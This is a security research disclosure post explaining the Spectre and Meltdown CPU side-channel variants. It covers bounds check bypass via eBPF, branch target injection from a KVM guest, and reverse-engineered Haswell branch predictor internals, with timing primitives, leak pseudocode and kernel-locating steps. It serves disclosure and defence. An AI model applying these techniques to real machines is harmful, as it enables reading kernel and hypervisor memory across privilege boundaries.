Reading Privileged Memory with a Side-Channel

Posted by Jann Horn, Project Zero


We have discovered that CPU data cache timing can be abused to efficiently leak information out of mis-speculated execution, leading to (at worst) arbitrary virtual memory read vulnerabilities across local security boundaries in various contexts.

Variants of this issue are known to affect many modern processors, including certain processors by Intel, AMD and ARM. For a few Intel and AMD CPU models, we have exploits that work against real software. We reported this issue to Intel, AMD and ARM on 2017-06-01 [1].

So far, there are three known variants of the issue:

  • Variant 1: bounds check bypass (CVE-2017-5753)
  • Variant 2: branch target injection (CVE-2017-5715)
  • Variant 3: rogue data cache load (CVE-2017-5754)

Before the issues described here were publicly disclosed, Daniel Gruss, Moritz Lipp, Yuval Yarom, Paul Kocher, Daniel Genkin, Michael Schwarz, Mike Hamburg, Stefan Mangard, Thomas Prescher and Werner Haas also reported them; their [writeups/blogposts/paper drafts] are at:


During the course of our research, we developed the following proofs of concept (PoCs):

  1. A PoC that demonstrates the basic principles behind variant 1 in userspace on the tested Intel Haswell Xeon CPU, the AMD FX CPU, the AMD PRO CPU and an ARM Cortex A57 [2]. This PoC only tests for the ability to read data inside mis-speculated execution within the same process, without crossing any privilege boundaries.
  2. A PoC for variant 1 that, when running with normal user privileges under a modern Linux kernel with a distro-standard config, can perform arbitrary reads in a 4GiB range [3] in kernel virtual memory on the Intel Haswell Xeon CPU. If the kernel's BPF JIT is enabled (non-default configuration), it also works on the AMD PRO CPU. On the Intel Haswell Xeon CPU, kernel virtual memory can be read at a rate of around 2000 bytes per second after around 4 seconds of startup time. [4]
  3. A PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific (now outdated) version of Debian's distro kernel [5] running on the host, can read host kernel memory at a rate of around 1500 bytes/second, with room for optimization. Before the attack can be performed, some initialization has to be performed that takes roughly between 10 and 30 minutes for a machine with 64GiB of RAM; the needed time should scale roughly linearly with the amount of host RAM. (If 2MB hugepages are available to the guest, the initialization should be much faster, but that hasn't been tested.)
  4. A PoC for variant 3 that, when running with normal user privileges, can read kernel memory on the Intel Haswell Xeon CPU under some precondition. We believe that this precondition is that the targeted kernel memory is present in the L1D cache.

For interesting resources around this topic, look down into the "Literature" section.

A warning regarding explanations about processor internals in this blogpost: This blogpost contains a lot of speculation about hardware internals based on observed behavior, which might not necessarily correspond to what processors are actually doing.

We have some ideas on possible mitigations and provided some of those ideas to the processor vendors; however, we believe that the processor vendors are in a much better position than we are to design and evaluate mitigations, and we expect them to be the source of authoritative guidance.

The PoC code and the writeups that we sent to the CPU vendors are available here: https://bugs.chromium.org/p/project-zero/issues/detail?id=1272.

Tested Processors

  • Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz (called "Intel Haswell Xeon CPU" in the rest of this document)
  • AMD FX(tm)-8320 Eight-Core Processor (called "AMD FX CPU" in the rest of this document)
  • AMD PRO A8-9600 R7, 10 COMPUTE CORES 4C+6G (called "AMD PRO CPU" in the rest of this document)
  • An ARM Cortex A57 core of a Google Nexus 5x phone [6] (called "ARM Cortex A57" in the rest of this document)

Glossary

retire: An instruction retires when its results, e.g. register writes and memory writes, are committed and made visible to the rest of the system. Instructions can be executed out of order, but must always retire in order.

logical processor core: A logical processor core is what the operating system sees as a processor core. With hyperthreading enabled, the number of logical cores is a multiple of the number of physical cores.

cached/uncached data: In this blogpost, "uncached" data is data that is only present in main memory, not in any of the cache levels of the CPU. Loading uncached data will typically take over 100 cycles of CPU time.

speculative execution: A processor can execute past a branch without knowing whether it will be taken or where its target is, thus executing instructions before it is known whether they should be executed. If this speculation turns out to have been incorrect, the CPU can discard the resulting state without architectural effects and continue execution on the correct execution path. Instructions do not retire before it is known that they are on the correct execution path.

mis-speculation window: The time window during which the CPU speculatively executes the wrong code and has not yet detected that mis-speculation has occurred.

Variant 1: Bounds check bypass

This section explains the common theory behind all three variants and the theory behind our PoC for variant 1 that, when running in userspace under a Debian distro kernel, can perform arbitrary reads in a 4GiB region of kernel memory in at least the following configurations:

  • Intel Haswell Xeon CPU, eBPF JIT is off (default state)
  • Intel Haswell Xeon CPU, eBPF JIT is on (non-default state)
  • AMD PRO CPU, eBPF JIT is on (non-default state)

The state of the eBPF JIT can be toggled using the net.core.bpf_jit_enable sysctl.

Theoretical explanation

The Intel Optimization Reference Manual says the following regarding Sandy Bridge (and later microarchitectural revisions) in section 2.3.2.3 ("Branch Prediction"):

Branch prediction predicts the branch target and enables the
processor to begin executing instructions long before the branch
true execution path is known.

In section 2.3.5.2 ("L1 DCache"):

Loads can:
[...]
  • Be carried out speculatively, before preceding branches are resolved.
  • Take cache misses out of order and in an overlapped manner.

Intel's Software Developer's Manual [7] states in Volume 3A, section 11.7 ("Implicit Caching (Pentium 4, Intel Xeon, and P6 family processors"):

Implicit caching occurs when a memory element is made potentially cacheable, although the element may never have been accessed in the normal von Neumann sequence. Implicit caching occurs on the P6 and more recent processor families due to aggressive prefetching, branch prediction, and TLB miss handling. Implicit caching is an extension of the behavior of existing Intel386, Intel486, and Pentium processor systems, since software running on these processor families also has not been able to deterministically predict the behavior of instruction prefetch.

Consider the code sample below. If arr1->length is uncached, the processor can speculatively load data from arr1->data[untrusted_offset_from_caller]. This is an out-of-bounds read. That should not matter because the processor will effectively roll back the execution state when the branch has executed; none of the speculatively executed instructions will retire (e.g. cause registers etc. to be affected).

struct array {
 unsigned long length;
 unsigned char data[];
};
struct array *arr1 = ...;
unsigned long untrusted_offset_from_caller = ...;
if (untrusted_offset_from_caller < arr1->length) {
 unsigned char value = arr1->data[untrusted_offset_from_caller];
 ...
}
However, in the following code sample, there's an issue. If arr1->length, arr2->data[0x200] and arr2->data[0x300] are not cached, but all other accessed data is, and the branch conditions are predicted as true, the processor can do the following speculatively before arr1->length has been loaded and the execution is re-steered:

  • load value = arr1->data[untrusted_offset_from_caller]
  • start a load from a data-dependent offset in arr2->data, loading the corresponding cache line into the L1 cache

struct array {
 unsigned long length;
 unsigned char data[];
};
struct array *arr1 = ...; /* small array */
struct array *arr2 = ...; /* array of size 0x400 */
/* >0x400 (OUT OF BOUNDS!) */
unsigned long untrusted_offset_from_caller = ...;
if (untrusted_offset_from_caller < arr1->length) {
 unsigned char value = arr1->data[untrusted_offset_from_caller];
 unsigned long index2 = ((value&1)*0x100)+0x200;
 if (index2 < arr2->length) {
   unsigned char value2 = arr2->data[index2];
 }
}

After the execution has been returned to the non-speculative path because the processor has noticed that untrusted_offset_from_caller is bigger than arr1->length, the cache line containing arr2->data[index2] stays in the L1 cache. By measuring the time required to load arr2->data[0x200] and arr2->data[0x300], an attacker can then determine whether the value of index2 during speculative execution was 0x200 or 0x300 - which discloses whether arr1->data[untrusted_offset_from_caller]&1 is 0 or 1.
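The timing measurement at the heart of this step can be sketched with the flush+reload primitive below. This is an illustrative, x86-specific sketch using compiler intrinsics (RDTSCP and CLFLUSH), not code from the PoC:

```c
#include <stdint.h>
#include <x86intrin.h>

/* Time a single load with RDTSCP (partially serializing, which keeps the
 * measurement from being reordered around the access). */
static inline uint64_t time_access(volatile uint8_t *p) {
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*p;
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
}

/* Evict the cache line holding p, so the next access goes to main memory. */
static inline void flush(volatile void *p) {
    _mm_clflush((const void *)p);
    _mm_mfence();
}
```

Timing arr2->data[0x200] and arr2->data[0x300] this way reveals which one was loaded during mis-speculation: the cached one comes back in tens of cycles, the flushed one in well over 100.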

To be able to actually use this behavior for an attack, an attacker needs to be able to cause the execution of such a vulnerable code pattern in the targeted context with an out-of-bounds index. For this, the vulnerable code pattern must either be present in existing code, or there must be an interpreter or JIT engine that can be used to generate the vulnerable code pattern. So far, we have not actually identified any existing, exploitable instances of the vulnerable code pattern; the PoC for leaking kernel memory using variant 1 uses the eBPF interpreter or the eBPF JIT engine, which are built into the kernel and accessible to normal users.

A minor variant of this could be to instead use an out-of-bounds read to a function pointer to gain control of execution in the mis-speculated path. We did not investigate this variant further.

Attacking the kernel

This section describes in more detail how variant 1 can be used to leak Linux kernel memory using the eBPF bytecode interpreter and JIT engine. While there are many interesting potential targets for variant 1 attacks, we chose to attack the Linux in-kernel eBPF JIT/interpreter because it provides more control to the attacker than most other JITs.

The Linux kernel supports eBPF since version 3.18. Unprivileged userspace code can supply bytecode to the kernel that is verified by the kernel and then:

  • either interpreted by an in-kernel bytecode interpreter
  • or translated to native machine code that also runs in kernel context using a JIT engine (which translates individual bytecode instructions without performing any further optimizations)

Execution of the bytecode can be triggered by attaching the eBPF bytecode to a socket as a filter and then sending data through the other end of the socket.
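To illustrate the trigger mechanism, the sketch below attaches a (classic, for brevity) BPF filter to one end of a socketpair and runs it by sending a datagram; an eBPF program would instead be loaded with the bpf() syscall and attached with SO_ATTACH_BPF, but the triggering works the same way. This is a simplified sketch, not the PoC's code:

```c
#define _GNU_SOURCE
#include <linux/filter.h>
#include <sys/socket.h>
#include <unistd.h>

/* Classic BPF program with a single instruction: accept the whole packet. */
static struct sock_filter accept_all[] = {
    BPF_STMT(BPF_RET | BPF_K, 0xffffffff),
};

/* Attach the filter to the receiving socket, then trigger in-kernel
 * execution of the filter by sending a datagram through the other end. */
int trigger_filter(void) {
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sv) != 0) return -1;
    struct sock_fprog prog = { .len = 1, .filter = accept_all };
    if (setsockopt(sv[1], SOL_SOCKET, SO_ATTACH_FILTER, &prog, sizeof(prog)) != 0)
        return -1;
    char out = 'x', in = 0;
    if (write(sv[0], &out, 1) != 1) return -1;  /* filter runs in kernel context here */
    if (read(sv[1], &in, 1) != 1) return -1;
    close(sv[0]);
    close(sv[1]);
    return in == 'x' ? 0 : -1;
}
```

Every datagram sent through sv[0] causes the kernel to run the attached filter, which is how the PoC repeatedly invokes its eBPF programs.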

Whether the JIT engine is enabled depends on a run-time configuration setting - but at least on the tested Intel processor, the attack works independent of that setting.

Unlike classic BPF, eBPF has data types like data arrays and function pointer arrays into which eBPF bytecode can index. Therefore, it is possible to use the code pattern described above in the kernel using eBPF bytecode.

eBPF's data arrays are less efficient than its function pointer arrays, so the attack will use the latter where possible.

Both machines on which this was tested have no SMAP, and the PoC relies on that (but it shouldn't be a precondition in principle).

Additionally, at least on the Intel machine on which this was tested, bouncing modified cache lines between cores is slow, apparently because the MESI protocol is used for cache coherence [8]. Changing the reference counter of an eBPF array on one physical CPU core causes the cache line containing the reference counter to be bounced over to that CPU core, making reads of the reference counter on all other CPU cores slow until the changed reference counter has been written back to memory. Because the length and the reference counter of an eBPF array are stored in the same cache line, this also means that changing the reference counter on one physical CPU core causes reads of the eBPF array's length to be slow on other physical CPU cores (intentional false sharing).
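The only structural precondition for this intentional false sharing is that the two fields fall into the same 64-byte cache line. With a hypothetical layout (field names illustrative, not the kernel's actual struct), that can be checked like this:

```c
#include <stddef.h>

/* Illustrative layout: if refcount and length land in the same 64-byte
 * cache line, writes to refcount on one core make reads of length slow
 * on all other cores (false sharing under MESI). */
struct ebpf_array_header {
    unsigned long refcount;
    unsigned long length;
};

int fields_share_cache_line(void) {
    const size_t line = 64;  /* cache line size on the tested CPUs */
    return offsetof(struct ebpf_array_header, refcount) / line ==
           offsetof(struct ebpf_array_header, length) / line;
}
```

Two adjacent unsigned longs at the start of a structure always share a line here, which is why refcount writes on one core slow down length reads everywhere else.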

The attack uses two eBPF programs. The first one tail-calls through a page-aligned eBPF function pointer array prog_map at a configurable index. In simplified terms, this program is used to determine the address of prog_map by guessing the offset from prog_map to a userspace address and tail-calling through prog_map at the guessed offsets. To cause the branch prediction to predict that the offset is below the length of prog_map, tail calls to an in-bounds index are performed in between. To increase the mis-speculation window, the cache line containing the length of prog_map is bounced to another core. To test whether an offset guess was successful, it can be tested whether the userspace address has been loaded into the cache.

Because such straightforward brute-force guessing of the address would be slow, the following optimization is used: 2^15 adjacent userspace memory mappings [9], each consisting of 2^4 pages, are created at the userspace address user_mapping_area, covering a total area of 2^31 bytes. Each mapping maps the same physical pages, and all mappings are present in the pagetables.
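The many-mappings trick relies on distinct virtual mappings backed by the same physical pages. On Linux this can be set up with memfd_create plus repeated MAP_SHARED mmap calls, sketched below with two aliases instead of 2^15 (an illustrative sketch, not the PoC's setup code):

```c
#define _GNU_SOURCE
#include <sys/mman.h>
#include <unistd.h>

/* Create two virtual aliases of one physical page and show that a write
 * through one alias is visible through the other. */
int aliases_share_page(void) {
    int fd = memfd_create("alias_demo", 0);
    if (fd < 0) return -1;
    if (ftruncate(fd, 4096) != 0) return -1;
    unsigned char *a = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    unsigned char *b = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if (a == MAP_FAILED || b == MAP_FAILED) return -1;
    a[123] = 42;                  /* write through the first alias */
    return b[123] == 42 ? 0 : -1; /* read it back through the second */
}
```

Because all aliases share physical storage, caching one of them in a physically indexed cache caches all of them, which is what the next step exploits.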



This permits the attack to be carried out in steps of 2^31 bytes. For each step, after causing an out-of-bounds access through prog_map, only one cache line each from the first 2^4 pages of user_mapping_area have to be tested for cached memory. Because the L3 cache is physically indexed, any access to a virtual address mapping a physical page will cause all other virtual addresses mapping the same physical page to become cached as well.

When this attack finds a hit—a cached memory location—the upper 33 bits of the kernel address are known (because they can be derived from the address guess at which the hit occurred), and the low 16 bits of the address are also known (from the offset inside user_mapping_area at which the hit was found). The remaining part of the address of user_mapping_area is the middle.



The remaining bits in the middle can be determined by bisecting the remaining address space: Map two physical pages to adjacent ranges of virtual addresses, each virtual address range the size of half of the remaining search space, then determine the remaining address bit-wise.

At this point, a second eBPF program can be used to actually leak data. In pseudocode, this program looks as follows:

uint64_t bitmask = <runtime-configurable>;
uint64_t bitshift_selector = <runtime-configurable>;
uint64_t prog_array_base_offset = <runtime-configurable>;
uint64_t secret_data_offset = <runtime-configurable>;
// index will be bounds-checked by the runtime,
// but the bounds check will be bypassed speculatively
uint64_t secret_data = bpf_map_read(array=victim_array, index=secret_data_offset);
// select a single bit, move it to a specific position, and add the base offset
uint64_t progmap_index = (((secret_data & bitmask) >> bitshift_selector) << 7) + prog_array_base_offset;
bpf_tail_call(prog_map, progmap_index);

This program reads 8-byte-aligned 64-bit values from an eBPF data array "victim_map" at a runtime-configurable offset and bitmasks and bit-shifts the value so that one bit is mapped to one of two values that are 2^7 bytes apart (sufficient to not land in the same or adjacent cache lines when used as an array index). Finally it adds a 64-bit offset, then uses the resulting value as an offset into prog_map for a tail call.
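The index computation in the pseudocode above is plain bit arithmetic and can be checked in isolation:

```c
#include <stdint.h>

/* Select one bit of secret_data and map it to one of two offsets that are
 * 2^7 bytes apart, then add the base offset (mirrors the pseudocode above). */
uint64_t progmap_index(uint64_t secret_data, uint64_t bitmask,
                       uint64_t bitshift_selector, uint64_t base_offset) {
    return (((secret_data & bitmask) >> bitshift_selector) << 7) + base_offset;
}
```

For example, selecting bit 3 (bitmask 0x8, shift 3) with base offset 0x200 yields 0x280 when the bit is set and 0x200 when it is clear - two indices 2^7 bytes apart, as required.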

This program can then be used to leak memory by repeatedly calling the eBPF program with an out-of-bounds offset into victim_map that specifies the data to leak and an out-of-bounds offset into prog_map that causes prog_map + offset to point to a userspace memory area. Misleading the branch prediction and bouncing the cache lines works the same way as for the first eBPF program, except that now, the cache line holding the length of victim_map must also be bounced to another core.

Variant 2: Branch target injection

This section describes the theory behind our PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific version of Debian's distro kernel running on the host, can read host kernel memory at a rate of around 1500 bytes/second.

Basics

Prior research (see the Literature section at the end) has shown that it is possible for code in separate security contexts to influence each other's branch prediction. So far, this has only been used to infer information about where code is located (in other words, to create interference from the victim to the attacker); however, the basic hypothesis of this attack variant is that it can also be used to redirect execution of code in the victim context (in other words, to use interference from the attacker to the victim; the other way around).



The basic idea for the attack is to target victim code that contains an indirect branch whose target address is loaded from memory and flush the cache line containing the target address out to main memory. Then, when the CPU reaches the indirect branch, it won't know the true destination of the jump, and it won't be able to calculate the true destination until it has finished loading the cache line back into the CPU, which takes a few hundred cycles. Therefore, there is a time window of typically over 100 cycles in which the CPU will speculatively execute instructions based on branch prediction.
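The core of this setup - flushing a function pointer so that the indirect call must be predicted while the real target loads - looks roughly like the x86-specific sketch below. Architecturally the correct target always retires; in a real attack it is the transient, mispredicted path that matters:

```c
#include <emmintrin.h>

static int hit;
static void target(void) { hit = 1; }
static void (*fptr)(void) = target;

/* Flush the cache line holding the pointer, then call through it: while the
 * pointer load completes (a few hundred cycles), the CPU runs speculatively
 * at whatever destination the branch predictor supplies, then retires the
 * architecturally correct call. */
int call_through_flushed_pointer(void) {
    hit = 0;
    _mm_clflush((const void *)&fptr);
    _mm_mfence();
    fptr();
    return hit;  /* always 1 architecturally, regardless of speculation */
}
```

The attacker's job in variant 2 is to control what the predictor supplies during that window.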

Haswell branch prediction internals

Some of the internals of the branch prediction implemented by Intel's processors have already been published; however, getting this attack to work properly required significant further experimentation to determine additional details.

This section focuses on the branch prediction internals that were experimentally derived from the Intel Haswell Xeon CPU.

Haswell seems to have multiple branch prediction mechanisms that work very differently:

  • A generic branch predictor that can only store one target per source address; used for all kinds of jumps, like absolute jumps, relative jumps and so on.
  • A specialized indirect call predictor that can store multiple targets per source address; used for indirect calls.
  • (There is also a specialized return predictor, according to Intel's optimization manual, but we haven't analyzed that in detail yet. If this predictor could be used to reliably dump out some of the call stack through which a VM was entered, that would be very interesting.)

Generic predictor

The generic branch predictor, as documented in prior research, only uses the lower 31 bits of the address of the last byte of the source instruction for its prediction. If, for example, a branch target buffer (BTB) entry exists for a jump from 0x4141.0004.1000 to 0x4141.0004.5123, the generic predictor will also use it to predict a jump from 0x4242.0004.1000. When the higher bits of the source address differ like this, the higher bits of the predicted destination change together with it—in this case, the predicted destination address will be 0x4242.0004.5123—so apparently this predictor doesn't store the full, absolute destination address.

Before the lower 31 bits of the source address are used to look up a BTB entry, they are folded together using XOR. Specifically, the following bits are folded together:

bit A         bit B
0x40.0000     0x2000
0x80.0000     0x4000
0x100.0000    0x8000
0x200.0000    0x1.0000
0x400.0000    0x2.0000
0x800.0000    0x4.0000
0x2000.0000   0x10.0000
0x4000.0000   0x20.0000

In other words, if a source address is XORed with both numbers in a row of this table, the branch predictor will not be able to distinguish the resulting address from the original source address when performing a lookup. For example, the branch predictor is able to distinguish source addresses 0x100.0000 and 0x180.0000, and it can also distinguish source addresses 0x100.0000 and 0x180.8000, but it can't distinguish source addresses 0x100.0000 and 0x140.2000 or source addresses 0x100.0000 and 0x180.4000. In the following, this will be referred to as aliased source addresses.
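A simple way to express this aliasing is a folding function that, for each (bit A, bit B) row of the table, XORs bit A into bit B's position. This is our model of the observed behavior, not a confirmed hardware implementation:

```c
#include <stdint.h>

/* (bit A, bit B) pairs from the table above. */
static const uint32_t fold_pairs[][2] = {
    {0x400000, 0x2000},     {0x800000, 0x4000},
    {0x1000000, 0x8000},    {0x2000000, 0x10000},
    {0x4000000, 0x20000},   {0x8000000, 0x40000},
    {0x20000000, 0x100000}, {0x40000000, 0x200000},
};

/* Model of the BTB index: fold bit A into bit B's position and drop bit A.
 * Flipping both bits of a pair then leaves the result unchanged (aliasing). */
uint32_t btb_fold(uint64_t src) {
    uint32_t addr = (uint32_t)src & 0x7fffffff; /* only the low 31 bits count */
    for (unsigned i = 0; i < sizeof(fold_pairs) / sizeof(fold_pairs[0]); i++) {
        if (addr & fold_pairs[i][0]) {
            addr ^= fold_pairs[i][1];
            addr &= ~fold_pairs[i][0];
        }
    }
    return addr;
}
```

Under this model, btb_fold(0x100.0000) collides with btb_fold(0x140.2000) and btb_fold(0x180.4000), but not with btb_fold(0x180.0000) or btb_fold(0x180.8000), matching the examples above.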

When an aliased source address is used, the branch predictor will still predict the same target as for the unaliased source address. This indicates that the branch predictor stores a truncated absolute destination address, but that hasn't been verified.

Based on observed maximum forward and backward jump distances for different source addresses, the low 32-bit half of the target address could be stored as an absolute 32-bit value with an additional bit that specifies whether the jump from source to target crosses a 2^32 boundary; if the jump crosses such a boundary, bit 31 of the source address determines whether the high half of the instruction pointer should increment or decrement.

Indirect call predictor

The inputs of the BTB lookup for this mechanism seem to be:

  • The low 12 bits of the address of the source instruction (we are not sure whether it's the address of the first or the last byte) or a subset of them.
  • The branch history buffer state.

If the indirect call predictor can't resolve a branch, it is resolved by the generic predictor instead. Intel's optimization manual hints at this behavior: "Indirect Calls and Jumps. These may either be predicted as having a monotonic target or as having targets that vary in accordance with recent program behavior."

The branch history buffer (BHB) stores information about the last 29 taken branches - basically a fingerprint of recent control flow - and is used to allow better prediction of indirect calls that can have multiple targets.

The update function of the BHB works as follows (in pseudocode; src is the address of the last byte of the source instruction, dst is the destination address):

void bhb_update(uint64_t *bhb_state, unsigned long src, unsigned long dst) {
 *bhb_state <<= 2;
 *bhb_state ^= (dst & 0x3f);
 *bhb_state ^= (src & 0xc0) >> 6;
 *bhb_state ^= (src & 0xc00) >> (10 - 2);
 *bhb_state ^= (src & 0xc000) >> (14 - 4);
 *bhb_state ^= (src & 0x30) << (6 - 4);
 *bhb_state ^= (src & 0x300) << (8 - 8);
 *bhb_state ^= (src & 0x3000) >> (12 - 10);
 *bhb_state ^= (src & 0x30000) >> (16 - 12);
 *bhb_state ^= (src & 0xc0000) >> (18 - 14);
 *bhb_state &= 0x3ffffffffffffff; /* the BHB state is 58 bits wide */
}

Some of the bits of the BHB state seem to be folded together further using XOR when used for a BTB access, but the precise folding function hasn't been understood yet.

The BHB is interesting for two reasons. First, knowledge about its approximate behavior is required in order to be able to accurately cause collisions in the indirect call predictor. But it also permits dumping out the BHB state at any repeatable program state at which the attacker can execute code - for example, when attacking a hypervisor, directly after a hypercall. The dumped BHB state can then be used to fingerprint the hypervisor or, if the attacker has access to the hypervisor binary, to determine the low 20 bits of the hypervisor load address (in the case of KVM: the low 20 bits of the load address of kvm-intel.ko).

Reverse-Engineering Branch Predictor Internals

This subsection describes how we reverse-engineered the internals of the Haswell branch predictor. Some of this is written down from memory, since we didn't keep a detailed record of what we were doing.

We initially attempted to perform BTB injections into the kernel using the generic predictor, using the knowledge from prior research that the generic predictor only looks at the lower half of the source address and that only a partial target address is stored. This sort of worked - however, the injection success rate was very low, below 1%. (This is the method we used in our preliminary PoCs for method 2 against modified hypervisors running on Haswell.)

We decided to write a userspace test case to be able to more easily test branch predictor behavior in different situations.

Based on the assumption that branch predictor state is shared between hyperthreads [10], we wrote a program of which two instances are each pinned to one of the two logical processors running on a specific physical core, where one instance attempts to perform branch injections while the other measures how often branch injections are successful. Both instances were executed with ASLR disabled and had the same code at the same addresses. The injecting process performed indirect calls to a function that accesses a (per-process) test variable; the measuring process performed indirect calls to a function that tests, based on timing, whether the per-process test variable is cached, and then evicts it using CLFLUSH. Both indirect calls were performed through the same callsite. Before each indirect call, the function pointer stored in memory was flushed out to main memory using CLFLUSH to widen the speculation time window. Additionally, because of the reference to "recent program behavior" in Intel's optimization manual, a bunch of conditional branches that are always taken were inserted in front of the indirect call.

In this test, the injection success rate was above 99%, giving us a base setup for future experiments.



We then tried to figure out the details of the prediction scheme. We assumed that the prediction scheme uses a global branch history buffer of some kind.

To determine the duration for which branch information stays in the history buffer, a conditional branch that is only taken in one of the two program instances was inserted in front of the series of always-taken conditional jumps, then the number of always-taken conditional jumps (N) was varied. The result was that for N=25, the processor was able to distinguish the branches (misprediction rate under 1%), but for N=26, it failed to do so (misprediction rate over 99%). Therefore, the branch history buffer had to be able to store information about at least the last 26 branches.

The code in one of the two program instances was then moved around in memory. This revealed that only the lower 20 bits of the source and target addresses have an influence on the branch history buffer.

Testing with different types of branches in the two program instances revealed that static jumps, taken conditional jumps, calls and returns influence the branch history buffer the same way; non-taken conditional jumps don't influence it; the address of the last byte of the source instruction is the one that counts; IRETQ doesn't influence the history buffer state (which is useful for testing because it permits creating program flow that is invisible to the history buffer).

Moving the last conditional branch before the indirect call around in memory multiple times revealed that the branch history buffer contents can be used to distinguish many different locations of that last conditional branch instruction. This suggests that the history buffer doesn't store a list of small history values; instead, it seems to be a larger buffer in which history data is mixed together.

However, a history buffer needs to "forget" about past branches after a certain number of new branches have been taken in order to be useful for branch prediction. Therefore, when new data is mixed into the history buffer, this can not cause data in bits that are already present in the history buffer to propagate downwards - and given that, upwards combination of data probably wouldn't be very useful either. Given that branch prediction also must be very fast, we concluded that it is likely that the update function of the history buffer left-shifts the old history buffer, then XORs in the new state (see diagram).



If this assumption is correct, then the history buffer contains a lot of information about the most recent branches, but only contains as many bits of information as are shifted per history buffer update about the last branch about which it contains any data. Therefore, we tested whether flipping different bits in the source and target addresses of a jump followed by 32 always-taken jumps with static source and target allows the branch prediction to disambiguate an indirect call. [11]

With 32 static jumps in between, no bit flips seemed to have an influence, so we decreased the number of static jumps until a difference was observable. The result with 28 always-taken jumps in between was that bits 0x1 and 0x2 of the target and bits 0x40 and 0x80 of the source had such an influence; but flipping both 0x1 in the target and 0x40 in the source or 0x2 in the target and 0x80 in the source did not permit disambiguation. This shows that the per-insertion shift of the history buffer is 2 bits and shows which data is stored in the least significant bits of the history buffer. We then repeated this with decreased amounts of fixed jumps after the bit-flipped jump to determine which data is stored in the remaining bits.
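A minimal per-branch insert function consistent with these observations (a hypothetical model, not the verified hardware function) would XOR-fold the named target and source bits together:

```python
def inserted_history_bits(src, dst):
    # Hypothetical model consistent with the experiments: target bit
    # 0x1 folds with source bit 0x40, and target bit 0x2 folds with
    # source bit 0x80, producing the 2 bits inserted per branch.
    b0 = ((dst >> 0) & 1) ^ ((src >> 6) & 1)
    b1 = ((dst >> 1) & 1) ^ ((src >> 7) & 1)
    return (b1 << 1) | b0

# Flipping only target bit 0x1 changes the inserted bits...
a = inserted_history_bits(0x1000, 0x2000)
b = inserted_history_bits(0x1000, 0x2001)
# ...but flipping target bit 0x1 and source bit 0x40 together does
# not, matching the pairs that could not be disambiguated.
c = inserted_history_bits(0x1040, 0x2001)
```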

Reading host memory from a KVM guest

Locating the host kernel

Our PoC locates the host kernel in several steps. The information that is determined and necessary for the following steps of the attack consists of:

  • lower 20 bits of the address of kvm-intel.ko
  • full address of kvm.ko
  • full address of vmlinux

Looking back, this is unnecessarily complicated, but it nicely demonstrates the various techniques an attacker can use. A simpler way would be to first determine the address of vmlinux, then bisect the addresses of kvm.ko and kvm-intel.ko.

In the first step, the address of kvm-intel.ko is leaked. For this purpose, the branch history buffer state after guest entry is dumped out. Then, for every possible value of bits 12..19 of the load address of kvm-intel.ko, the expected lowest 16 bits of the history buffer are computed based on the load address guess and the known offsets of the last 8 branches before guest entry, and the results are compared against the lowest 16 bits of the leaked history buffer state.

The branch history buffer state is leaked in steps of 2 bits by measuring misprediction rates of an indirect call with two targets. One way the indirect call is reached is from a vmcall instruction followed by a series of N branches whose relevant source and target address bits are all zeroes. The second way the indirect call is reached is from a series of controlled branches in userspace that can be used to write arbitrary values into the branch history buffer.
Misprediction rates are measured as in the section "Reverse-Engineering Branch Predictor Internals", using one call target that loads a cache line and another one that checks whether the same cache line has been loaded.



With N=29, mispredictions will occur at a high rate if the controlled branch history buffer value is zero because all history buffer state from the hypercall has been erased. With N=28, mispredictions will occur if the controlled branch history buffer value is one of 0<<(28*2), 1<<(28*2), 2<<(28*2), 3<<(28*2) - by testing all four possibilities, it can be detected which one is right. Then, for decreasing values of N, the four possibilities are {0|1|2|3}<<(28*2) | (history_buffer_for(N+1) >> 2). By repeating this for decreasing values of N, the branch history buffer value for N=0 can be determined.
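This recovery loop can be simulated end-to-end. In the sketch below (Python; the 58-bit width and the exact-collision oracle are simplifying assumptions standing in for the real misprediction-rate measurement), `SECRET` plays the role of the history state left behind by the hypercall:

```python
HISTORY_BITS = 58
MASK = (1 << HISTORY_BITS) - 1
SECRET = 0x2AB8C3F1D4E5 & MASK    # stands in for the hypercall's history

def observed_history(n):
    # Victim history after n padding branches whose relevant address
    # bits are all zero: each taken branch shifts the buffer left by 2.
    return (SECRET << (2 * n)) & MASK

def collides(candidate, n):
    # Stands in for "high misprediction rate on the shared indirect
    # call", i.e. the attacker-built history matches the victim's.
    return candidate == observed_history(n)

recovered = 0                      # with N=29, all hypercall state is gone
for n in range(28, -1, -1):
    for top2 in range(4):
        candidate = (top2 << (28 * 2)) | (recovered >> 2)
        if collides(candidate, n):
            recovered = candidate
            break
# recovered == SECRET once the loop reaches n == 0
```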

At this point, the low 20 bits of kvm-intel.ko are known; the next step is to roughly locate kvm.ko.
For this, the generic branch predictor is used, using data inserted into the BTB by an indirect call from kvm.ko to kvm-intel.ko that happens on every hypercall; this means that the source address of the indirect call has to be leaked out of the BTB.

kvm.ko will probably be located somewhere in the range from 0xffffffffc0000000 to 0xffffffffc4000000, with page alignment (0x1000). This means that the first four entries in the table in the section "Generic Predictor" apply; there will be 2^4-1=15 aliasing addresses for the correct one. But that is also an advantage: It cuts down the search space from 0x4000 to 0x4000/2^4=0x400.

To find the correct address for the source or one of its aliasing addresses, code that loads data through a specific register is placed at all possible call targets (the leaked low 20 bits of kvm-intel.ko plus the in-module offset of the call target plus a multiple of 2^20) and indirect calls are placed at all possible call sources. Then, alternatingly, hypercalls are performed and indirect calls are performed through the different possible non-aliasing call sources, with randomized history buffer state that prevents the specialized prediction from working. After this step, there are 2^16 remaining possibilities for the load address of kvm.ko.

Next, the load address of vmlinux can be determined in a similar way, using an indirect call from vmlinux to kvm.ko. Luckily, none of the bits which are randomized in the load address of vmlinux are folded together, so unlike when locating kvm.ko, the result will directly be unique. vmlinux has an alignment of 2MiB and a randomization range of 1GiB, so there are still only 512 possible addresses.
